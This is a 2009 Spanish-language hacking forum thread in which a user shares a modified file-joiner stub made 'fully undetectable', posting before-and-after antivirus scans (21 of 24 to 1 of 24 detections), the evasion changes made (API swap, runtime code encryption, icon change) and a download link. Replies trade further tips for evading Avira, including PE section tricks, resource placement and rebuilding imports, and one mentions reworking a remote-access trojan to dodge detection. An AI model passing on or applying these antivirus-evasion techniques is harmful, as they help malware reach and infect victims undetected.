elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
14 Febrero 2012, 07:56  


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderadores: Karcrack, [Zero])
| | |-+  Small Joiner [FUD 1/24]		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Small Joiner [FUD 1/24]  (Leído 2,140 veces)
Karcrack
Moderador
***
Desconectado Desconectado

Mensajes: 2.132


Se siente observado ¬¬'


Ver Perfil
Small Joiner [FUD 1/24]
« en: 22 Marzo 2009, 17:46 »
Buenas :D

Conocen este joiner?

Citar
Versión Final: SMALL JOINER by E0N (Joiner Open Source en ASM)

Seguro que si :P

Bueno, pues estaba aburrido y queria practicar ASM y me acorde de que era de codigo abierto, asi que lo modifique ;D

ANTES:
Citar

File Info

Report generated: 22.3.2009 at 17.41.50 (GMT 1)
Filename: Stub_OLD.dll
File size: 6 KB
MD5 Hash: 03A927AD6937401E910A3260F503E845
SHA1 Hash: C2B85276CC329BE9B5687E7B2726647EB1084595
Packer detected: Nothing found *
Self-Extract Archive: Nothing found
Binder Detector:  Nothing found
Detection rate: 21 on 24

Detections

a-squared - Virus.Trojan.Win32.Buzus.acj!IK
Avira AntiVir - DR/MicroJoiner.Gen
Avast - Win32:Agent-ABDD [trj]
AVG - Generic9.AWBB
BitDefender - Trojan.Dropper.Zlob.AGN
ClamAV - Trojan.Agent-13414
Comodo - TrojWare.Win32.Buzus.acj    
Dr.Web - Trojan.MulDrop.18143
Ewido - Trojan.Buzus.acj
F-PROT 6 - W32/Trojan2.AGMZ
G DATA - Trojan.Win32.Buzus.acj   A
IkarusT3 - Virus.Trojan.Win32.Buzus.acj
Kaspersky - Trojan.Win32.Buzus.acj
McAfee - Generic.dx trojan  
MHR (Malware Hash Registry) - Virus Found - detect rate 89%
NOD32 v3 - Win32/TrojanDropper.Agent.NRS 
Norman - Trojan W32/Smalltroj.CLYF
Panda - Nothing found!
Quick Heal - Trojan.Buzus.acj
Solo Antivirus - Nothing found!
Sophos - Mal/Generic-A
TrendMicro - Nothing found!
VBA32 - Trojan.Win32.Buzus.acj   
Virus Buster - Trojan.Buzus.JS

Scan report generated by 
NoVirusThanks.org
DESPUES:
Citar

File Info

Report generated: 22.3.2009 at 17.42.37 (GMT 1)
Filename: Stub.dll
File size: 3 KB
MD5 Hash: 41A9DDEF3383D30ECD4C1C614E7A1888
SHA1 Hash: 9B7D82DAA5F42F63DBCE0F307C0B95F15B911FF9
Packer detected: Nothing found *
Self-Extract Archive: Nothing found
Binder Detector:  Nothing found
Detection rate: 1 on 24

Detections

a-squared - Nothing found!
Avira AntiVir - TR/Crypt.XPACK.Gen
Avast - Nothing found!
AVG - Nothing found!
BitDefender - Nothing found!
ClamAV - Nothing found!
Comodo - Nothing found! 
Dr.Web - Nothing found!
Ewido - Nothing found!
F-PROT 6 - Nothing found!
G DATA - Nothing found!
IkarusT3 - Nothing found!
Kaspersky - Nothing found!
McAfee - Nothing found! 
MHR (Malware Hash Registry) - Nothing found!
NOD32 v3 - Nothing found! 
Norman - Nothing found!
Panda - Nothing found!
Quick Heal - Nothing found!
Solo Antivirus - Nothing found!
Sophos - Nothing found!
TrendMicro - Nothing found!
VBA32 - Nothing found!   
Virus Buster - Nothing found!

Scan report generated by 
NoVirusThanks.org

Las modificaciones que le he hecho han sido las siguientes:
  • Reemplazar el API ShellExecuteA (MUY detectada) por WinExec
  • Agregarle un macro de encriptacion, que cifra el codigo y se descifra en ejecucion.
  • Cambiarle el icono, lo que hace que pasa de un tamaño de 6kb a 3kb ;D

Solo quedaria el Avira, pero ya cada uno que lo haga por su parte :P

Venga, aqui tienen:
Código:
http://www.box.net/shared/jog1856kql      CODIGO+DLL

Saludos ;)
En línea
~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.983


Ver Perfil WWW
Re: Small Joiner [FUD 1/24]
« Respuesta #1 en: 22 Marzo 2009, 23:50 »
Buena modificación

Para el avira creo que con eliminar los datos del eof y ponerlos como resources sería suficiente
Salu2, E0N
En línea
Krackwar ™

Desconectado Desconectado

Mensajes: 100



Ver Perfil
Re: Small Joiner [FUD 1/24]
« Respuesta #2 en: 23 Marzo 2009, 00:05 »
NO creo que sea eso ya que aunque no le tengas agregado archivos a el stub lo detecta igual
En línea
WHK es mas u17r4m4573r31337 que yo



El error mas grande de el mundo es decir que el ser humano es inteligente.

Facismo , antifacismo , etc.. la misma mierda ..
Soy el-> http://tinyurl.com/fantasma-de-krackwar
Código
mov ecx,1000
Etiqueta:
invoke printf,"No Copiare en clases"
loop Etiq
ricardovinzo

Desconectado Desconectado

Mensajes: 135


P.T.C


Ver Perfil
Re: Small Joiner [FUD 1/24]
« Respuesta #3 en: 23 Marzo 2009, 02:28 »
Mi pregunta, si creas una nueva sección en el PE con los datos eso serviria?
En línea
3# Convocacion de Moderadores en Code Makers, entra!
Krackwar ™

Desconectado Desconectado

Mensajes: 100



Ver Perfil
Re: Small Joiner [FUD 1/24]
« Respuesta #4 en: 23 Marzo 2009, 02:57 »
Ricardo bajatelo , es solo el stub , la parte de agregar una nueva secciçon abria que hacerla desde el joiner no desde su stub =P
En línea
WHK es mas u17r4m4573r31337 que yo



El error mas grande de el mundo es decir que el ser humano es inteligente.

Facismo , antifacismo , etc.. la misma mierda ..
Soy el-> http://tinyurl.com/fantasma-de-krackwar
Código
mov ecx,1000
Etiqueta:
invoke printf,"No Copiare en clases"
loop Etiq
~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.983


Ver Perfil WWW
Re: Small Joiner [FUD 1/24]
« Respuesta #5 en: 23 Marzo 2009, 16:35 »
En vez de añadir una nueva sección puedes ampliar la última. Busca por google "Realing PE" y mira lo que hacen esos módulos para bypasear el avira con EOF, aunque segun dice Kr4ckwar no es por eso :P
En línea
Krackwar ™

Desconectado Desconectado

Mensajes: 100



Ver Perfil
Re: Small Joiner [FUD 1/24]
« Respuesta #6 en: 23 Marzo 2009, 18:30 »
Cita de: E0N en 23 Marzo 2009, 16:35
En vez de añadir una nueva sección puedes ampliar la última. Busca por google "Realing PE" y mira lo que hacen esos módulos para bypasear el avira con EOF, aunque segun dice Kr4ckwar no es por eso :P
Claro que no es por eso por que ese es un analisis de el stub sion ningun archivo agregado por el joiner , y el Realign PE si no mal recuerdo agregaba todo lo que quedaba en el fiunal de el archivo a la ultima sección y en este caso no hay nada todavía puesto al final de el archivo.  :P
En línea
WHK es mas u17r4m4573r31337 que yo



El error mas grande de el mundo es decir que el ser humano es inteligente.

Facismo , antifacismo , etc.. la misma mierda ..
Soy el-> http://tinyurl.com/fantasma-de-krackwar
Código
mov ecx,1000
Etiqueta:
invoke printf,"No Copiare en clases"
loop Etiq
[Zero]
Moderador
***
Desconectado Desconectado

Mensajes: 1.050


CALL DWORD PTR DS:[0]


Ver Perfil WWW
Re: Small Joiner [FUD 1/24]
« Respuesta #7 en: 23 Marzo 2009, 21:02 »
Si hay EOF el avira te lo chapa en seguida, pero en este caso no debe de ser por lo que dice krackwar. El avira es muy **** seguro te lo saltas si compilas con fasm de otro modo haciendo tu el import, seguramente esa firma esté en la tabla de improtaciones. Avira es un quebradero de cabeza, sobre todo si no tienes el source original, estoy modificando una versión del poison y dejando el archivo en blanco, todo a 0's, sin EOF y con dos secciones, una ejecutable y otra data, me detecta el PE aún no se porque  :-\.

PD: De todas formas, si tienes que agregarlo a la sección del resource, sinó en cuanto lo joinees con algo lo va a detectar, pero supongo no será el único.

Saludos
En línea

“El Hombre, en su orgullo, creó a Dios a su imagen y semejanza.”
Nietzsche
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines